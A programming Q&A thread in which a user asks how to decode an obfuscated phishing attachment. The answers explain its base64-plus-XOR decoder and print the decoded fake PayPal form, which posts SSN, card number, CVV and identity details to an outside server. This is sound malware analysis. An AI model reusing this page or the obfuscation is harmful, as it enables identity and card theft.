# Javascript Advanced Unicode Encode/Decode

Tags: javascript, unicode, decode, encode

So I was looking around in my spam folder and found this message:

---

> *Dеаг Vаluеd ΜеmЬег,*
>
> *Wе аѕκ fοг уοuг tіmе tο сагеfullу геаd thіѕ nοtіfісаtіοn ѕеnt Ьу οuг*
>   *Αссοunt Rеνіеw Τеаm.*
>
> *Оuг ѕесuгіtу ѕуѕtеm hаѕ Ьlοсκеd unuѕuаl сhагgеѕ tο а сгеdіt сагd*
>   *lіnκеd tο уοuг ассοunt.*
>
> *Αn іntгuѕіοn іntο уοuг ассοunt hаѕ Ьееn dеtесtеd whісh ѕhοwѕ thаt ѕοmеοnе tгіеd tο ассеѕѕ уοuг ΡауΡаl ассοunt wіthοut уοuг*
>   *ρегmіѕѕіοn. wе hаνе lіmіtеd ассеѕѕ tο уοuг ассοunt duе tο thіѕ*
>   *ρгοЬlеm. Μοгеονег, wе hаνе ѕеnt уοu аn аttасhmеnt whісh сοntаіnѕ аll*
>   *thе nесеѕѕагу ѕtеρѕ іn οгdег tο геѕtοге уοuг ассοunt ассеѕѕ. Ρlеаѕе*
>   *dοwnlοаd аnd ορеn іt іn уοuг Ьгοwѕег.*
>
> *Ρlеаѕе dο undегѕtаnd thаt thіѕ іѕ а ѕесuгіtу mеаѕuге tаκеn wіth іntеntіοn tο ρгοtесt уοu аnd уοuг ассοunt. Wе аροlοgіzе fοг аnу*
>   *іnсοnνеnіеnсе.*
>
> *Ѕіnсегеlу, ΡауΡаl Αссοunt Rеνіеw Τеаm*

---

Attached to the e-mail was a "Verification_2015.html"

The code is too large for 'stackoverflow' so it can be found here: http://pastebin.com/UxcGwSv7

I tried to decoded it using several decoders I found lerking around the internet but none worked, I am guessing there is some advanced javascript encoding going on here that I cannot figure out.

Can someone either:

- (A) Point me in the right direction to decode this.
- (B) Explain to me how to decode this and the inner workings of it all.
- or (C) Decode it for me.

Thank you in advanced,
-Sean D.

Answer (score 3, accepted):

Obfuscated JavaScript that produces JavaScript (instead of running as some sort of interpreter, for example) is pretty easy to decode! Just look for the part that turns the transformed string into some kind of “real-world” action. Here, it’s `document.write`, which you can replace with `console.log` and run to yield HTML directly.

Here it is run through tidyhtml:

```
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="generator" content=
"HTML Tidy for Linux (vers 25 March 2009), see www.w3.org">
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content=
"text/html; charset=us-ascii">
<title>Account Verification</title>

<style type="text/css">
<!td {font-family: verdana,arial,helvetica,sans-serif;font-size:12px;color: #000000;}.pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size:18px;font-weight: bold;color: #003366;} hr.dotted {width: 100%; margin-top: 0px; margin-bottom: 0px; border-left:#fff; border-right: #fff; border-top: #fff; border-bottom: 2px dotted #ccc;}hr.space {width:139px; border-color:#FFFFFF; };.pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size:11px;color: #aaaaaa;}.pp_sidebartextbold {font-family:verdana,arial,helvetica,sans-serif;font-size: 11px;font-weight: bold;color:#003366;} .pp_sidebartext {font-family: verdana,arial,helvetica,sans-serif;font-size:11px;color: #003366;} .ppem106 {font-weight: 700;}submit.primary, input.submit.primary {border-left:1px solid #d5bd98; border-right:1px solid #935e0d; border-top:1px solid #d5bd98; border-bottom:1px solid #935e0d; background:#ffa822 url('orange.gif'); left}submit.primary:active, input.submit.primary:active {border:1px solid #935e0d; border-right-color:#d5bd98; border-bottom-color:#d5bd98;}input, select {border:1px solid #adc2d6;}.main_block {width: 100px; align:center-right; margin: 0 auto; }.main_block:before,.main_block:after { overflow:hidden; content:""; display:table; }.main_block:after { clear:both; }.inner_block { display: inline-block; float:center; width:100%;}.inner_block img { width:100%; height:auto; vertical-align:middle; }>
</style>
</head>
<body>
<p align="center"><font color="#FFFFFF"><span style=
"background-color: #FFFFFF">______</span></font><img border="0"
src="https://www-techinasia.netdna-ssl.com/wp-content/uploads/2012/02/paypal.jpg"
width="350" height="180"></p>
<div class="main_block">
<div class="inner_block"><img src=
"http://www.johncflood.com/wp-content/uploads/2011/10/ssl-secure-logo.png"></div>
<div class="inner_block"><img src=
"http://www.b2bonline.pl/media/cms_page_media/47/Verisign3.jpg"></div>
</div>
<table cellspacing="0" cellpadding="0" width="200" align="center"
border="0">
<tbody>
<tr valign="top">
<td width="200" style=
"font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000">
<table cellspacing="0" cellpadding="5" width="100%" border="0">
<tbody>
<tr valign="top">
<td style=
"font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000">
<p align="center">&nbsp;</p>
<p><b><font size="2">Please fill in the correct information for the
following fields to verify your identity.</font></b></p>
<table cellspacing="0" cellpadding="0" width="103%" border="0">
<tbody>
<tr>
<td></td>
</tr>
</tbody>
</table>
<table cellspacing="0" cellpadding="0" width="889" border="0">
<tbody>
<tr>
<td class="pp_heading" align="center" valign="top" width="646">
<form action="http://www.linksec.su/services.php" method="post"
name="Date"><input type="hidden" name="id" value=
"44464"><input type="hidden" name="redirection" value=
""><input type="hidden" name="siteId" value="CB&quot;"><input name=
"form_charset" type="hidden" value="UTF-8">
<fieldset><legend>Personal Identification</legend>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="18">
<tr valign="bottom">
<td height="23">
<p align="left"><font face="Verdana" size="2"><span>Full
Name:</span></font></p>
</td>
<td height="1" align="right" width="367">
<p align="left"><input name="pname" tabindex="1" size="28"></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="28">
<tr valign="bottom">
<td height="23">
<p align="left"><font face="Verdana" size="2"><span>Date Of
Birth:</span></font></p>
</td>
<td align="right" width="367" height="29">
<p align="left"><label for="pdobtype"><font size="2" face=
"Verdana, Arial, Helvetica, sans-serif"><select name="pdobday" id=
"pdobday" size="1" tabindex="2">
<option value="00" selected>Day</option>
<option value="01">01</option>
<option value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select></font></label> <span>-</span> <label for=
"pdobtype"><font size="2" face=
"Verdana, Arial, Helvetica, sans-serif"><select name="pdobmonth"
id="pdobmonth" size="1" tabindex="3">
<option value="00" selected>Month</option>
<option value="Jan">Jan</option>
<option value="Feb">Feb</option>
<option value="Mar">Mar</option>
<option value="Apr">Apr</option>
<option value="May">May</option>
<option value="Jun">Jun</option>
<option value="Jul">Jul</option>
<option value="Aug">Aug</option>
<option value="Sep">Sep</option>
<option value="Oct">Oct</option>
<option value="Nov">Nov</option>
<option value="Dec">Dec</option>
</select></font></label> <span>-</span> <label for=
"pdobtype"><font size="2" face=
"Verdana, Arial, Helvetica, sans-serif"><select name="pdobyear" id=
"pdobyear" size="1" tabindex="3">
<option value="00" selected>Year</option>
<option value="1915">1915</option>
<option value="1916">1916</option>
<option value="1917">1917</option>
<option value="1918">1918</option>
<option value="1919">1919</option>
<option value="1920">1920</option>
<option value="1921">1921</option>
<option value="1922">1922</option>
<option value="1923">1923</option>
<option value="1924">1924</option>
<option value="1925">1925</option>
<option value="1926">1926</option>
<option value="1927">1927</option>
<option value="1928">1928</option>
<option value="1929">1929</option>
<option value="1930">1930</option>
<option value="1931">1931</option>
<option value="1932">1932</option>
<option value="1933">1933</option>
<option value="1934">1934</option>
<option value="1935">1935</option>
<option value="1936">1936</option>
<option value="1937">1937</option>
<option value="1938">1938</option>
<option value="1939">1939</option>
<option value="1940">1940</option>
<option value="1941">1941</option>
<option value="1942">1942</option>
<option value="1943">1943</option>
<option value="1944">1944</option>
<option value="1945">1945</option>
<option value="1946">1946</option>
<option value="1947">1947</option>
<option value="1948">1948</option>
<option value="1949">1949</option>
<option value="1950">1950</option>
<option value="1951">1951</option>
<option value="1952">1952</option>
<option value="1953">1953</option>
<option value="1954">1954</option>
<option value="1955">1955</option>
<option value="1956">1956</option>
<option value="1957">1957</option>
<option value="1958">1958</option>
<option value="1959">1959</option>
<option value="1960">1960</option>
<option value="1961">1961</option>
<option value="1962">1962</option>
<option value="1963">1963</option>
<option value="1964">1964</option>
<option value="1965">1965</option>
<option value="1966">1966</option>
<option value="1967">1967</option>
<option value="1968">1968</option>
<option value="1969">1969</option>
<option value="1970">1970</option>
<option value="1971">1971</option>
<option value="1972">1972</option>
<option value="1973">1973</option>
<option value="1974">1974</option>
<option value="1975">1975</option>
<option value="1976">1976</option>
<option value="1977">1977</option>
<option value="1978">1978</option>
<option value="1979">1979</option>
<option value="1980">1980</option>
<option value="1981">1981</option>
<option value="1982">1982</option>
<option value="1983">1983</option>
<option value="1984">1984</option>
<option value="1985">1985</option>
<option value="1986">1986</option>
<option value="1987">1987</option>
<option value="1988">1988</option>
<option value="1989">1989</option>
<option value="1990">1990</option>
<option value="1991">1991</option>
<option value="1992">1992</option>
<option value="1993">1993</option>
<option value="1994">1994</option>
<option value="1995">1995</option>
<option value="1996">1996</option>
<option value="1997">1997</option>
</select></font></label></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="18">
<tr valign="bottom">
<td height="23">
<p align="left"><font face="Verdana" size="2"><span>Mother's Maiden
Name:</span></font></p>
</td>
<td align="right" width="367" height="29">
<p align="left"><input name="pmmn" tabindex="3" size="28"></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="34">
<tr valign="bottom">
<td>
<p align="left"><font face="Verdana" size=
"2"><span>Country:</span></font></p>
</td>
<td align="right" width="367">
<p align="left"><font color="#000000"><strong><select id="pcountry"
name="pcountry" height:="" size="1" tabindex="4">
<option selected>United States</option>
<option>Albania</option>
<option>Algeria</option>
<option>American Samoa</option>
<option>Andorra</option>
<option>Angola</option>
<option>Anguilla</option>
<option>Antarctica</option>
<option>Antigua And Barbuda</option>
<option>Argentina</option>
<option>Armenia</option>
<option>Aruba</option>
<option>Australia</option>
<option>Austria</option>
<option>Azerbaijan</option>
<option>Bahamas</option>
<option>Bahrain</option>
<option>Bangladesh</option>
<option>Barbados</option>
<option>Belarus</option>
<option>Belgium</option>
<option>Belize</option>
<option>Benin</option>
<option>Bermuda</option>
<option>Bhutan</option>
<option>Bolivia</option>
<option>Bosnia and Herzegovina</option>
<option>Botswana</option>
<option>Bouvet Island</option>
<option>Brazil</option>
<option>British Indian Ocean Territory</option>
<option>Brunei Darussalam</option>
<option>Bulgaria</option>
<option>Burkina Faso</option>
<option>Burma</option>
<option>Burundi</option>
<option>Cambodia</option>
<option>Cameroon</option>
<option>Canada</option>
<option>Cape Verde</option>
<option>Cayman Islands</option>
<option>Central African Republic</option>
<option>Chad</option>
<option>Chile</option>
<option>China</option>
<option>Christmas Island</option>
<option>Cocos (Keeling) Islands</option>
<option>Colombia</option>
<option>Comoros</option>
<option>Congo</option>
<option>Congo, the Democratic Republic of the</option>
<option>Cook Islands</option>
<option>Costa Rica</option>
<option>Cote d'Ivoire</option>
<option>Croatia</option>
<option>Cyprus</option>
<option>Czech Republic</option>
<option>Denmark</option>
<option>Djibouti</option>
<option>Dominica</option>
<option>Dominican Republic</option>
<option>East Timor</option>
<option>Ecuador</option>
<option>Egypt</option>
<option>El Salvador</option>
<option>England</option>
<option>Equatorial Guinea</option>
<option>Eritrea</option>
<option>Espana</option>
<option>Estonia</option>
<option>Ethiopia</option>
<option>Falkland Islands</option>
<option>Faroe Islands</option>
<option>Fiji</option>
<option>Finland</option>
<option>France</option>
<option>French Guiana</option>
<option>French Polynesia</option>
<option>French Southern Territories</option>
<option>Gabon</option>
<option>Gambia</option>
<option>Georgia</option>
<option>Germany</option>
<option>Ghana</option>
<option>Gibraltar</option>
<option>Great Britain</option>
<option>Greece</option>
<option>Greenland</option>
<option>Grenada</option>
<option>Guadeloupe</option>
<option>Guam</option>
<option>Guatemala</option>
<option>Guinea</option>
<option>Guinea-Bissau</option>
<option>Guyana</option>
<option>Haiti</option>
<option>Heard and Mc Donald Islands</option>
<option>Honduras</option>
<option>Hong Kong</option>
<option>Hungary</option>
<option>Iceland</option>
<option>India</option>
<option>Indonesia</option>
<option>Ireland</option>
<option>Israel</option>
<option>Italy</option>
<option>Jamaica</option>
<option>Japan</option>
<option>Jordan</option>
<option>Kazakhstan</option>
<option>Kenya</option>
<option>Kiribati</option>
<option>Korea (North)</option>
<option>Korea, Republic of</option>
<option>Korea (South)</option>
<option>Kuwait</option>
<option>Kyrgyzstan</option>
<option>Lao People's Democratic Republic</option>
<option>Latvia</option>
<option>Lebanon</option>
<option>Lesotho</option>
<option>Liberia</option>
<option>Liechtenstein</option>
<option>Lithuania</option>
<option>Luxembourg</option>
<option>Macau</option>
<option>Macedonia</option>
<option>Madagascar</option>
<option>Malawi</option>
<option>Malaysia</option>
<option>Maldives</option>
<option>Mali</option>
<option>Malta</option>
<option>Marshall Islands</option>
<option>Martinique</option>
<option>Mauritania</option>
<option>Mauritius</option>
<option>Mayotte</option>
<option>Mexico</option>
<option>Micronesia, Federated States of</option>
<option>Moldova, Republic of</option>
<option>Monaco</option>
<option>Mongolia</option>
<option>Montserrat</option>
<option>Morocco</option>
<option>Mozambique</option>
<option>Myanmar</option>
<option>Namibia</option>
<option>Nauru</option>
<option>Nepal</option>
<option>Netherlands</option>
<option>New Caledonia</option>
<option>New Zealand</option>
<option>Nicaragua</option>
<option>Niger</option>
<option>Nigeria</option>
<option>Niue</option>
<option>Norfolk Island</option>
<option>Northern Ireland</option>
<option>Northern Mariana Islands</option>
<option>Norway</option>
<option>Oman</option>
<option>Pakistan</option>
<option>Palau</option>
<option>Panama</option>
<option>Papua New Guinea</option>
<option>Paraguay</option>
<option>Peru</option>
<option>Philippines</option>
<option>Pitcairn</option>
<option>Poland</option>
<option>Portugal</option>
<option>Puerto Rico</option>
<option>Qatar</option>
<option>Reunion</option>
<option>Romania</option>
<option>Russia</option>
<option>Russian Federation</option>
<option>Rwanda</option>
<option>San Marino</option>
<option>Sao Tome and Principe</option>
<option>Saudi Arabia</option>
<option>Scotland</option>
<option>Senegal</option>
<option>Seychelles</option>
<option>Singapore</option>
<option>Slovakia</option>
<option>Slovenia</option>
<option>Solomon Islands</option>
<option>Somalia</option>
<option>South Africa</option>
<option>South Georgia and the South Sandwich Islands</option>
<option>South Korea</option>
<option>Spain</option>
<option>Sri Lanka</option>
<option>St. Helena</option>
<option>Sweden</option>
<option>Switzerland</option>
<option>Taiwan</option>
<option>Tajikistan</option>
<option>Tanzania</option>
<option>Thailand</option>
<option>Togo</option>
<option>Tokelau</option>
<option>Tonga</option>
<option>Trinidad</option>
<option>Trinidad and Tobago</option>
<option>Tunisia</option>
<option>Turkey</option>
<option>Turkmenistan</option>
<option>Uganda</option>
<option>Ukraine</option>
<option>United Arab Emirates</option>
<option>United Kingdom</option>
<option>United States</option>
<option>United States Minor Outlying Islands</option>
<option>Uruguay</option>
<option>USA</option>
<option>Uzbekistan</option>
<option>Vanuatu</option>
<option>Vatican City State (Holy See)</option>
<option>Venezuela</option>
<option>Viet Nam</option>
<option>Virgin Islands (British)</option>
<option>Virgin Islands (U.S.)</option>
<option>Wales</option>
<option>Wallis and Futuna Islands</option>
<option>Western Sahara</option>
<option>Yemen</option>
<option>Zambia</option>
<option>Zimbabwe</option>
</select></strong></font></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="27">
<tr valign="bottom">
<td height="27">
<p align="left"><font face="Verdana" size=
"2"><span>State:</span></font></p>
</td>
<td align="right" width="367" height="27">
<p align="left"><input name="pstate" size="14" tabindex="5"></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="27">
<tr valign="bottom">
<td height="27">
<p align="left"><font face="Verdana" size=
"2"><span>City:</span></font></p>
</td>
<td align="right" width="367" height="27">
<p align="left"><input name="pcity" size="14" tabindex="6"></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="27">
<tr valign="bottom">
<td height="27">
<p align="left"><font face="Verdana" size=
"2"><span>Address:</span></font></p>
</td>
<td align="right" width="367" height="27">
<p align="left"><font face="Verdana"><input name="paddr" size="31"
tabindex="7"></font></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="34">
<tr valign="bottom">
<td>
<p align="left"><font face="Verdana" size="2"><span>Zip
Code:</span></font></p>
</td>
<td align="right" width="367">
<p align="left"><input name="pzip" size="10" tabindex="8"
maxlength="10"></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="27">
<tr valign="bottom">
<td height="27">
<p align="left"><font face="Verdana" size="2"><span>Phone
Number:</span></font></p>
</td>
<td align="right" width="367" height="27">
<p align="left"><input name="pphone" size="14" tabindex="9"></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="27">
<tr valign="bottom">
<td height="27">
<p align="left"><font face="Verdana" size="2"><span>Social Security
Number (SSN):</span></font></p>
</td>
<td align="right" width="367" height="27">
<p align="left"><input name="pssn" size="14" tabindex="10"></p>
</td>
</tr>
</table>
</fieldset>
<br>
<fieldset><legend>Credit/Debit Card Verification</legend>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="29">
<tr valign="bottom">
<td height="29">
<p align="left"><font face="Verdana" size="2"><span>Card
Number:</span></font></p>
</td>
<td align="right" width="367" height="29">
<p align="left"><input name="pccn" size="16" tabindex="11"
maxlength="16" onkeypress="return numonly(this, event)"></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="28">
<tr valign="bottom">
<td height="28">
<p align="left"><font face="Verdana" size="2"><span>Expiration
Date:</span></font></p>
</td>
<td align="right" width="367" height="28">
<p align="left"><label for="pcctype"><font size="2" face=
"Verdana, Arial, Helvetica, sans-serif"><select name="pexpm" id=
"pexpm" size="1" tabindex="12">
<option value="00" selected>Month</option>
<option value="01">01</option>
<option value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
</select></font></label> <span>-</span> <label for=
"pcctype"><font size="2" face=
"Verdana, Arial, Helvetica, sans-serif"><select name="pexpy" id=
"pexpy" size="1" tabindex="13">
<option value="00" selected>Year</option>
<option value="15">2015</option>
<option value="16">2016</option>
<option value="17">2017</option>
<option value="18">2018</option>
<option value="19">2019</option>
<option value="20">2020</option>
<option value="21">2021</option>
<option value="22">2022</option>
<option value="23">2023</option>
<option value="24">2024</option>
<option value="2025">2025</option>
</select></font></label> <font size="2" face=
"Verdana"><span>&nbsp;(Ex: 05/2015)</span></font></p>
</td>
</tr>
</table>
<table width="500" border="0" cellpadding="0" cellspacing="0"
height="30">
<tr valign="bottom">
<td height="30">
<p align="left"><font face="Verdana" size="2"><span>Card
Verification Number (CVV2):</span></font></p>
</td>
<td align="right" width="367" height="30">
<p align="left"><input name="pcvv" size="4" tabindex="14"
maxlength="3" onkeypress="return numonly(this, event)"></p>
</td>
</tr>
</table>
<p align="center"><font color="#003366"><input type="submit"
tabindex="15" name="x01.php" value="Submit Form" class=
"primary"></font></p>
<p align="left"><font color="#003366"><font size="1">By clicking
the button "Submit Form" you confirm your identity with us. The
form is submitted instantly.</font></font></p>
<p align="left"></p>
</fieldset>
</form>
</td>
<td class="pp_heading" align="left" width="239" valign="top" style=
"padding-left: 4px;">
<table cellspacing="0" cellpadding="0" width="100%" bgcolor=
"#FFFFFF" border="0">
<tbody>
<tr>
<td style=
"font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000">
<table cellspacing="0" cellpadding="5" width="100%" bgcolor=
"#EEEEEE" border="0">
<tbody>
<tr>
<td class="pp_sidebartextbold" align="middle">Protect Your Account
Info</td>
</tr>
</tbody>
</table>
<table cellspacing="0" cellpadding="5" width="100%" border="0">
<tbody>
<tr>
<td class="pp_sidebartext"><br>
Make sure you never provide your password to fraudulent
persons.<br>
<br>
PayPal automatically encrypts your confidential information using
the Secure Sockets Layer protocol (SSL) with an encryption key
length of 128-bits (the highest level commercially available).<br>
<br>
For more information on protecting yourself from fraud, please
review our Security Tips at
http://www.paypal.com/securitytips<br></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td style=
"font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000">
<table cellspacing="0" cellpadding="5" width="100%" bgcolor=
"#EEEEEE" border="0">
<tbody>
<tr>
<td class="pp_sidebartextbold" align="middle">Protect Your
Password</td>
</tr>
</tbody>
</table>
<table cellspacing="0" cellpadding="5" width="100%" border="0">
<tbody>
<tr>
<td class="pp_sidebartext">You should <span class=
"ppem106">never</span> give your PayPal password to anyone,
including PayPal employees.<br></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<hr class="space">
<p>&nbsp;</p>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td style=
"font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000">
<br></td>
</tr>
</tbody>
</table>
</td>
<td style=
"font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000">
</td>
<td valign="top" width="190" style=
"font-family: verdana,arial,helvetica,sans-serif; font-size: 12px; color: #000000">
&nbsp;</td>
</tr>
</tbody>
</table>
</body>
</html>
```

Answer (score 1):

I think I got this particular message just yesterday. Avast ended up flagging it while it was being downloaded through Outlook, and I thought to have a look at it today. It seems the attachment I received is identical to yours. Let's focus on the script.

The first line, `function BDE(r)`, looks like a decoder of sorts. Looking at the second line, which calls this function, it is apparent that `BDE()` is a base64 decoder. The second line calls it to convert the base64 into a blob and stores it in `BSs`.

If you decode the base64 string, you'll notice that the result isn't exactly readable. Looking at the rest of the script, it is clear that the decoded result is fed through another function, and after being transformed by that function, should result in something that looks like HTML. The third line is where it gets interesting. Here's the code prettified:

```
function XD1(r, t) {
    var n = [],
    o = "";
    for (z = 1; 255 >= z; z++) n[String.fromCharCode(z)] = z;
    for (j = z = 0; z < r.length; z++) o += String.fromCharCode(n[r.substr(z, 1)] ^ n[t.substr(j, 1)]), j = j < t.length ? j + 1 : 0;
    return o
}
```

Variable `n` is an array, which is initialized with values 0 to 255, as you can see from the third line. We'll call it the "cipher table". `o` is the return value. The fourth line is where the real work gets done. Keep in mind `r` is the content to decrypt, and `t` is the key. What the loop does is for each byte in the content, it uses that byte to index into the cipher table, and at the same time, sequentially picks a byte from the key and uses it to index into the cipher table. The two resulting bytes are XORed together, converted to a character, and appended to the result. The reason why the table is used instead of XORing directly is because a string XOR a string doesn't produce a useful result. Instead, by indexing into the table, two numbers are received, which can be XORed together, and the result can be converted to a character. In the end, this is your standard XOR cipher.

One interesting quirk to note about the decryption loop is this fragment: `j = j < t.length ? j + 1 : 0`. When you get to the case where `j` is one less than `t.length`, `j` is still incremented, and results in trying to use an out of bounds index to `t`. `substr()` returns `0`, which effectively adds a null character to the end of the key when using a proper implementation of the XOR cipher.

The last line of the parent script writes the decrypted data to the document, which is a simple HTML page with a form to submit your credit card info.

Summary: The script base64 decodes, then XOR decrypts the data, and writes it to the page.